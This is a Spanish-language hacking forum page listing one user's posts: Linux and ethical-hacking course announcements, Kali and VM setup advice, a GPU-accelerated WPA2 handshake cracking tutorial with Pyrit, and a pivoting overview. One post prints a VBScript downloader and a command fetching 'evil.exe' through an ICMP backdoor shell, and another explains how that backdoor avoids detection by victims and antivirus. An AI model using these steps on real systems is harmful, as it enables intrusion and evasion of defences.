Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Xc0d3's

#1
GNU/Linux / Curso de Linux desde cero
Marzo 19, 2022, 06:24:58 PM
Hola comunidad!

Hace mucho que no publico contenido en el foro, recién me he animado a publicar contenido gratuito nuevamente y esta vez quiero invitarlos a formar parte de varios cursos de pago (de mi propia academia) que estaré liberando en YouTube, el primero es un curso de Linux completamente desde cero hasta nivel avanzado. Creo que es una buena oportunidad para los que se inician en Linux y porque no, también para los que ya tienen algunos conocimientos.

Les dejo un enlace a la lista de reproducción en YouTube: "Aprende Linux desde Cero"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Me encantaría aprovechar el foro para darle soporte a las clases que estaré subiendo.

Saludos!
#2
He leido todas las respuestas de los demas miembros del foro, que bueno que has resuelto gran parte de tu problema.

Quiero comentarte algo, no puedes utilizar tu adaptador WIFI integrado para hacer auditorias en con la VM de Kali, tienes la obción de utilizar un adaptador USB y conectarlo directamente a la VM de Kali para realizar las pruebas. Solo puedes utilizar el adaptador integrado cuando tienes una instalación física del sistema en tu HDD o sea como sistema principal y no una VM.

Veo que aun tienes problemas para instalar las Adiciones de Invitado y el Vbox Extension Pack, creo que es mejor que te recomiende un video para que veas los pasos uno a uno y no explicarte el proceso.

Aquí dejo dos links que te exlican todo el proceso, el primero es la instalación del sistema (no es Kali, es Parrot Security pero es practicamente lo mismo) y tambien parte de la configuración de la red (NAT, HostOnly y Bridge). El otro video es sobre la instalación de las Adiciones de Invitado (VBoxGuestAdditions).

 
#3
Dudas y pedidos generales / Re:duda con docker
Octubre 28, 2017, 08:02:42 PM
Eso está difícil colega, por no decir imposible.

La idea de un container de Kali en Docker es tener la posibilidad de tener un pequeño sistema personalizado para algunas funciones, principalmente Footprinting, sacar Vulnerabilidades, Auditorias a sitios WEB, entre otras pocas más... o sea tener un sistema ligero, preparado para realizar algunas tareas (no todas) o tener un buen rendimiento con pocos recursos, el contenedor de Kali para Docker no tiene GUI, como mucho puedes iniciar algunos servicios como BeEF, Openvas, etc.. pero no es posible lebantar una Interfaz de Usuario, por lo que no vas a poder correr servicios como Armitage, Zenmap, Burpsuite, Vega, etc.

En realidad no es necesario usar Katoolin para instalar las herramientas de Kali en el container, de hecho esa imagen ya esta por defecto con los repositorios oficiales de Kali. Si quieres tener algo más amigable puedes instalarlo, aun así no puedes iniciar ninguna herramienta de GUI. Otra cosa, antes de usar Katoolin, reviza el código fuente (no lo uses en tu sistema Debian) ya que este script lo que hace es reemplazar los repositorios  configurados en /etc/apt/sources.list por lo repositorios de Kali, esto puede volver tu sistema totalmente inestable.

Saludos!
#4
Chequea este repo en GitHub, tiene una serie de exploits que te permiten escalar privilegios en el sistema.

Código: php
https://github.com/WindowsExploits/Exploits/
#5
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
También funciona en Kali?

Si colega, el ataque se puede realizar en cualquier sistema GNU/Linux
#6
Hola Underc0ders!

Quiero compartir con ustedes este tutorial sobre como configurar la tarjeta gráfica para optimizar el cracking de contraseñas WPA2 mediante ataque de diccionario al handshake con Pyrit.

- Las pruebas las he realizado en Ubuntu 16.04 con los siguientes paquetes instalados:

aircrack-ng
pyrit
pyrit-opencl
nvidia-375 (driver de la tarjeta grafica)
nvidia-settings

- Hardware utilizado para realizar las pruebas:

CPU Intel Core i7 5500U @ 2.4GHz x 4 (2 nucleos 4 hilos)

GPU Nvidia Quadro K620M, 2GB, 64bit, 384 CUDA Cores.

Memoria RAM 16 GB DDR3 1600 MHz (esto no influye)

No voy a explicar la parte de como capturar el "4 way handshake", aquí en el foro hay muchos tutoriales sobre eso, de todas maneras para los nuevos usuarios he dejado un video al final del post con todo el proceso.

Asumiendo que ya tenemos el handshake, pasamos a instalar los paquetes necesarios, antes debemos activar el repositorio multiverse.

Ubuntu 16.04:
Código: php

usuario@ubuntu:~$ sudo apt-add-repository multiverse && sudo apt-get update
usuario@ubuntu:~$ sudo apt-get search nvidia
.......
nvidia-304 - NVIDIA legacy binary driver - version 304.135
nvidia-304-updates - Transitional package for nvidia-304
nvidia-304-updates-dev - Transitional package for nvidia-304-dev
nvidia-340 - NVIDIA binary driver - version 340.102
nvidia-361 - Transitional package for nvidia-367
nvidia-361-dev - Transitional package for nvidia-367-dev
nvidia-367 - Transitional package for nvidia-375
nvidia-367-dev - Transitional package for nvidia-375-dev
nvidia-375 - NVIDIA binary driver - version 375.66
nvidia-375-dev - NVIDIA binary Xorg driver development files
.........


Luego deben instalar los paquetes necesarios, en el caso del driver para nvidia, deben instalar el último driver disponible.

Código: php
usuario@ubuntu:~$ sudo apt-get install pyrit pyrit-opencl nvidia-375 nvidia-settings -y 




Parrot Security:

Deben cheaquear que su tarjeta gráfica este en la lista de compatibilidad, en el siguiente link pueden chequear esta información.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Luego deben instalar los paquetes necesarios:

Código: php
┌─[user@parrot]─[~]
└──╼ $ sudo apt-get update && sudo apt-get dist-upgrade
┌─[user@parrot]─[~]
└──╼ $sudo apt-get install nvidia-driver bumblebee-nvidia pyrit-opencl


  Editar archivo de configuración
 
Código: php
 ┌─[user@parrot]─[~]
└──╼ $sudo nano /etc/bumblebee/bumblebee.conf





Reincie su sistema y compruebe la versión de instalación de Nvidia
 
Código: php
 ┌─[user@parrot]─[~]
└──╼ $ optirun glxinfo | Grep OpenGL



Si todos los paquetes se instalaron correctamente podemos pasar a realizar la prueba de rendimiento de pyrit

Código: php
xc0d3@thinkpad-w550s:~/scripts$ pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (27635.7 PMKs/s)... \

Computed 27635.68 PMKs/s total.
#1: 'OpenCL-Device 'Quadro K620M'': 28886.4 PMKs/s (RTT 2.8)
#2: 'CPU-Core (SSE2)': 324.8 PMKs/s (RTT 3.2)
#3: 'CPU-Core (SSE2)': 328.6 PMKs/s (RTT 3.1)
#4: 'CPU-Core (SSE2)': 321.1 PMKs/s (RTT 3.2)
xc0d3@thinkpad-w550s:~/scripts$


Se puede apreciar como pyrit ha sustituido uno de los nucleos de mi CPU y en su lugar esta usando la GPU, la cual es aproximadamente 20 veces más eficiente que el CPU. He logrado resultados de hasta 32000PMK/s, dicionarios como el rouckyou es cuestion de unos 6mins probar todas las posibles contraseñas, aun no he realizado las pruebas con Base de Datos, creo que con este rendimiento puede pasar de 30 000 000 PMK/s.

Saludos!

Video Tutorial con todo el proceso de Cracking desde aircrack-ng hasta Pyrit:


#7
Dudas y pedidos generales / Re:Ataques locales
Octubre 21, 2017, 08:24:00 PM
Hola colega!

Lo primero, si ejecutas exploits detras de una red NAT, no puedes realizar conexiones reversas (*reverse_tcp), debes intentar realizar conexiones bind (*bind_tcp) porque estas de tras de un NAT y sin redireccionar puertos la victima no tiene acceso a la red interna de la VM.

Los escaneos con nmap (sobre todo los escaneos intensos) pueden dar problemas en VMware si no tienes el modo promiscuo activado, tambien es posible que de falsos positivos, al realizar un "nmap -sP ip/mascara". Por otro lado chequea que los adaptadores de vmware esten configurados correctamente o por default que es la mejor obción para nuevos usuarios. Esos dispositivos que dices que realmente no estan conectados, son los adaptadores de vmware, el cual usa varios ips, todos pertenecen a tu sistema Host.

Es normal que diga que estas conectado por Ethernet en las VMs, ya que estas no tienen un adaptador WIFI conectado a ellas, tu sistema Host es el que tiene el adaptador WIFI y la conexión de todas las VM siempre va a ser una interfaz Ethernet virtualizada a menos que conectes un dispositivo WIFI físico a la VM utilizando los puertos USB de tu ordenador y anclando este dispositivo a la VM.

Lo que hace que tu VM tenga internet es esa conexión NAT, tambien puedes configurarla en modo puente, pedo debes saber con que adaptador vas a realizar esta conexión en puente, en caso de que tu red local no este configurada con DHCP, debes configurar una IP de forma manual, ya que la VM a pesar de ser una VM es un sistema completamente distinto al sistema Host, por lo tanto si los adaptadores de red no estan bien configurados, no vas a poder establecer una conexión reversa y en muchos casos tampoco una bind. Te recomiendo que utilices dos adaptadores de red como mínimo en tu sistema virtual, uno NAT y otro Host Only, el NAT le da acceso a la red local y a internet a la VM utilizando tu ordenador físico (digamos que como tunel), y el Host Only es una red virtual solo para las VMs y el sistema Host, ideal para que empieses a realizar escaneos con nmap, ejecutar exploits y realizar varios tipos de técnicas en ambientes controlados. Creo que un soldado no debe ir a la guerra sin antes pasar el entrenamiento ;)

Saludos!
#8
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
una pregunta la victima se puede dar cuenta de esto ?

Hola bro, realmente es muy dificil que la víctima se de cuenta ya que esta backdoor no utiliza ningun puerto, realmente no establese ninguna conexion por ningun puerto, son simples peticiones ICMP modificadas, lo que si puede ver la víctima es en los procesos de windows la backdoor en ejecución, cosa que se puede evitar o hacer dificil la detección  utilizando un buen nombre para el proceso o se apara la backdoor. Por lo demas ningun AV puede detectarla porque de cierta forma no es malware sino simples peticiones ICMP modificadas, para que en lugar de chequear la latencia envien estos paquetes de datos que contienen el acceso a la shell de windows y en la respuesta llegan los comandos que enviamos. Básicamente así es como funciona.

Saludos
#9
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta gracias por la opinión colega, me alegro mucho que te guste el material, el principal objetivo es compartir y ayudar a todo el que esta empezando en este mundo de la seguridad. Saludos ;)
#10
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta si quieres instalar wine con el objetivo de correr algun programa como shellter, veil-evasion o alguno que requiera wine32 instalado y tu sistema operativo (Kali) es de 64bit (amd64) debes agregar la arquitectura de 32bit (i386) de lo contrario no podras instalar wine32.

aqui te dejo las lineas:
Código: php

root@kali:~# dpkg --add-architecture i386
root@kali:~# apt-get update
root@kali:~# apt-get install wine32


o como dice @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:
Código: php

root@kali:~# apt-get install wine*

para que instales todo lo que tiene que ver con wine, ya sean versiones de 32 o 64 bits y wine-utils o wine-tools.

la gran mayoria de las herramientas, exploits, RATs, etc, que tienen entre sus dependencias a wine, requieren la version de 32bit de wine (wine32)

Espero resuelvas, Saludos ;)
#11
Hacking / [Video Tutorial] Tutorial de Netcat
Septiembre 02, 2017, 08:00:47 PM
Hola underc0ders!

Hoy quiero compartir con la comunidad este video tutorial de Netcat, una exelente herramienta para hackers y administradores de sistema.

Descripción breve:
Netcat es una herramienta de red, que nos permite leer y escribir tanto en protocolos TCP como UDP. Puede correr en modo cliente y en modo servidor, se puede utilizar para leer banners, como port-scanner, para transferir archivos, para chat, para ejecutar bind-shells y reverse-shells. En fin, estas características hacen que Netcat sea apodada como   "La navaja suiza de los Hacker".

Aquí les dejo el video, espero lo disfruten. Saludos ;)

#12
Estoy de acuerdo con @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, y más si no tienes mucha experiencia en el tema o en el uso de Distribuciones GNU/Linux, no solo para principiantes, este metodo tambien es recomendado para usuarios avanzados e incluso para Profecionales (a menos que tengan un hardware dedicado solo para este objetivo). Tener el sistema instalado en una maquina virtual tiene muchas ventajas y muy pocas desbentajas.

Ventajas:

- Realizar copias de seguridad de esta máaquina virtual y en caso de problemas restaurar la máquina desde la copia de seguridad.

- Reinstalar tu Sistema Operativo Host y no perder la o las maquinas virtuales, ya que solo instalando el software que utilizas para virtualizar puedes usar una de las copias de seguridad que hiciste en tu instalacion previa.

- No ensuciar tu sistema operativo host, con esto me refiero a no instalar cosas que no vas a usar, herramientas, librerias, en fin, mantener tu sistema host limpio es sinónimo de estabilidad y seguridad.

- Kali-Linux no es un sistema para usarlo como distribución principal, es un sistema para hacer pruebas de penetración, de tenerlo instalado físico en tu ordenador (a menos que tengas varios ordenadores), estarias usando el sistema para tus labores del dia a dia, esto acaba con Kali-Linux, lo vuelve inestable e inseguro.

Desventajas:

- Al tener el sistema instalado en una máquina virtual, el rendimiento de esta máquina va a estar limitado... limitado a los recursos que le des a esta máquina virtual. Si tienes un Ordenador con buen rendimiento (core i5, core i7, SSD como disco duro principal y 12 o 16GB de memoria RAM) puedes permitirte asignarle buenos recursos, en ese caso esto no seria una desventaja.

- Puede que te encuentres limitado con algunos dispositivos USB (a la hora de conectarlos a la máquina virtual), principalmente dispositivos wifi que es lo que por lo general necesitamos conectar a nuestra máquina virtual y en todo caso esto no seria una total desventaja porque en el caso de realizar Pruebas de penetración a redes inalambricas es recomendable usar una USB en modo live o con persistencia para aprovechar al máximo el rendimiento de tu ordenador.


Hay otras ventajas y desventajas, pero bueno, en mi opinión, estas son las principales.

Concluciones:
Si estas iniciandote en el mundo del Pentesting (sin antes conocer GNU/Linux), primeramente aprende un poquito sobre GNU/Linux, Networking y algunos comandos y caractiristicas principales del sistema que vas a elegir para iniciarte en este mundo. Es aburrido y tedioso pero es el proceso ideal, de lo contrario, tienes doble trabajo, aprender Pentesting y aprender a trabajar en GNU/Linux a la ves.

Como sistemas operativos para iniciarte en lo que es el Pentesting como tal, te recomiendo Kali-Linux o Parrot Security OS ya que ambos son basados en debian, fáciles de trabajar (incluso para principiantes) y existe más documentación sobre estos sistemas que de otros... y hay exelentes comunidades que te pueden ayudar mucho en tu aprendisaje, un gran ejemplo es Underc0de y la otra es la Comunidad de Parrot Security.

Como sistema o software para virtualizar, VirtualBox o VMware Workstation, ambos exelentes, yo me voy más por VirtualBox ya que es Software Libre y bueno realmente no me gusta mucho el Software Privativo.

Bueno, hasta aquí mi comentario colegal. Saludos

#13
por lo general en los resultados que te da joomscan, te da referencia de donde puedes encontrar el exploit, cual es la url vulnerable o como puedes explotar la vulnerabilidad, muchas son explotables desde el mismo navegador, fíjate bien en la salida de joomscan.

Saludos!
#14
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

parece copado si deja un backdoor indetectable, voy a verlo

lo malo es que si no tenes ip reservation, por logica el ip del backdoor se caga. y otra cosa que no me dejo conectar a un servidor ftp para bajar y subir archivos, es un poco limitado

Bueno realmente desde esa shell se pueden hacer muchas cosas (hay que estudiarse un poquito cmd.exe), que prefieras un meterpreter ya es es otra cosa... es mucho más cómodo claro.
También esta la opción de escribir un wget en vbscript y bueno bajar lo que quieras desde un servidor http, no he probado este método con icpmsh, supongo que funcione bien, dejo el debate abierto para que prueben y les dejo el código a continuación.

wget en vbscript:
Código: php
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs


modo de uso:
Código: php
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe


también quiero mencionar que esta shell es una obción que tenemos para evadir Firewalls, IDS/IPS y AV, lo que seamos capaces de hacer a partir de ahí depende mucho de nosotros ;)

Saludos!
#15
Hola Underc0ders!

Esta ves quiero compartir con ustedes sobre un curso en el que estoy trabajando, al cual le estoy poniendo muchas ganas. El curso lo voy a ir publicando en mi canal de YouTube y en la Documentación Official de Parrot Security OS en Español. Tengo pensado dar toda una introducción a lo que es GNU/Linux, Instalación del Sistema, la Shell, Comandos Básicos, Trabajo con archivos, Editores de texto, Networking, Bash y Python scripting y bueno ya creada esta base en los estudiantes comenzaré con una Introducción al Hacking Ético y luego nos adentraremos en el mundo del Pentesting ya como tal.  El curso lo voy a desarrollar narrado, completamente en español, con soporte via Telegram-Messenger (para los estudiantes que tengan dudas o necesiten una atención diferenciada) todo esto de totalmente gratis y por su puesto con Parrot Security, esto no quiere decir que no sirva para usuarios de Kali-Linux u otras distribuciones de pentesting, al final los conseptos, las tecnicas y las herramientas son las mismas. Los invito a que chequeen la Presentación del Curso y bueno si creen que vale la pena el contenido animense a seguirlo ya sea en el Canal de YouTube o en la página de la Documentación de Parrot Security.

Saludos ;)

Link en la Documentación de Parrot Security:
Código: php
https://docs.parrotsec-es.org/doku.php?id=curso_de_hacking_etico


#16
Presentaciones y cumpleaños / Re: Hola Underc0ders!
Agosto 24, 2017, 03:40:25 AM
Externos colega! gracias por la bienvenida y disculpa la demora en responder.

jaja tu padre tiene mucha razon!

Saludos
#17
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Estimado @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, a mi si me gustaría que me compartieras esa información, ya estoy leyendo unos tutos de Antrax y estoy intruseando este foro acerca de troyanos y malwares, pero no quiero marearme con tanta información random, prefiero seguir un orden como el que expusiste más arriba, pero sola sin una guía, me voy a la B...

Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Se me hace un poco dificil hacerle llegar esa información, pero bueno, te puedo orientar, contactame por alguna de las vias que tengo en mi firma, tambien le recomiendo que si esta empezando desde cero, estoy abriendo un Curso de Hacking Ético en mi canal de YouTube completamente desde cero, y bueno le doy soporte a los usuarios via telegram (no solo a mis suscritores, a todo el que quiera o necesite ayuda en este mundo de la Seguridad Informática) totalmente gratis. Nada, contácteme de forma privada y le hecho una mano en lo que pueda, consejos, documentación, recomendaciones, experiencias... en fin. Saludos

PS: no soy "xc0d3", soy "@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta", estan linkeando mal mi usuario.
#18
Buenas colegas!

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con los recursos que tiene tu portatil, no te recomiendo instalar Windows 7 en caso de que estes pensando virtualizar Kali, como dice @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Windows 7 ira peor y Kali virtualizado en el aun peor... Te recomiendo igual Debian o Ubuntu 16.04 en caso de que no te guste la familia RHEL (RedHat, CentOS, Fedora), en mi caso uso CentOS y me va de maravilla, practicamente me sobran recursos y mi portatil no es la gran cosa. Tienes la obción de virtualizar Kali o cualquier distro de pentesting que quieras (te recomiendo Parrot Security va muy bien en ordenadores con pocos recursos y de lujo en VBox o VMware y no se vuelve lento con el tiempo como Kali.) o tambien tienes la obción de usar Kali en Docker para ahorrar recursos y montas en VMs los sistemas que quieras testear.

Saludos!
#19
Hacking / Re:Herramientas BlackHat 2017
Agosto 21, 2017, 01:00:39 PM
 Buena recomendación colega, estoy siguiendo el repo desde hace unas semanas, hay una gran variedad de herramientas para todo tipo de pruebas, ya he probado algunas y he obtenido muy buenos resultados.

Saludos.
#20
 Hola underc0ders!

Esta vez quiero compartír este post sobre Pivoting, esta exelente técnica utilizada por los Hackers que consiste en utilizar sistemas comprometidos para atacar otros sistemas en la misma red corporativa o red privada del sistema previamente comprometido, con el fin de evitar restricciones de NAT, configuraciones de Firewalls y Sistemas de Detención y/o Prevención de Intrusos (IDS/IPS). Por ejemplo, si comprometemos la seguridad de un servidor mediante esta técnica podemos utilizar ese servidor para continuar con la explotación y post-explotación a otros ordenadores en su red privada.

Exiten dos tipos de Pivoting.
Proxy Pivoting; consiste en la práctica de canalizar el trafico a travéz de un ordenador comprometido utilizandolo de proxy para lanzar ataques a otros ordenadores en su misma red privada, para burlar posibles filtros de IP, configuraciones de Firewalls o simplemente para ocultar nuestra verdadera dirección IP.

VPN Pivoting; consiste en crear un túnel encriptado en el ordenador comprometido y de esta forma redirigir dinámicamente todo el tráfico a través de ese ordenador comprometido para hacer reconodimiento en su red privada, escaneos de vulnerabilidades y explotación de posibles vulnerabilidades encontradas, no importa si esta detras de un Firewall o detras de un NAT en una red privada.

Por lo general ambos tipo de Pivoting son ejecutados en el ordenador comprometido al igual que los payloads que ejecutamos al explotar una vulnerabilidad utilizando un exploit. Al atacar una ordenador vulnerable de la red y conseguír acceso al mismo, un atacante podría infectar la mayoría o la totalidad de ordenadores de una red y obtener un control completo de los ordenadores de una compañia o de una red privada como tal.

A continuación les dejo un video en que que se demuestra un ataque de tipo VPN Pivoting.

Esenario:
Nota: en el video las IPs de los ordenadores son distintas.

Ordenadores                               Foto                      Video
atacante (Parrot Security) ----> 199.16.45.52    =    172.25.12.84
víctima 1 (Windows 10) -------> 192.168.78.5    =    172.25.12.143
víctima 2 (Windows 7 ) --------> 192.168.78.25  =    192.168.56.103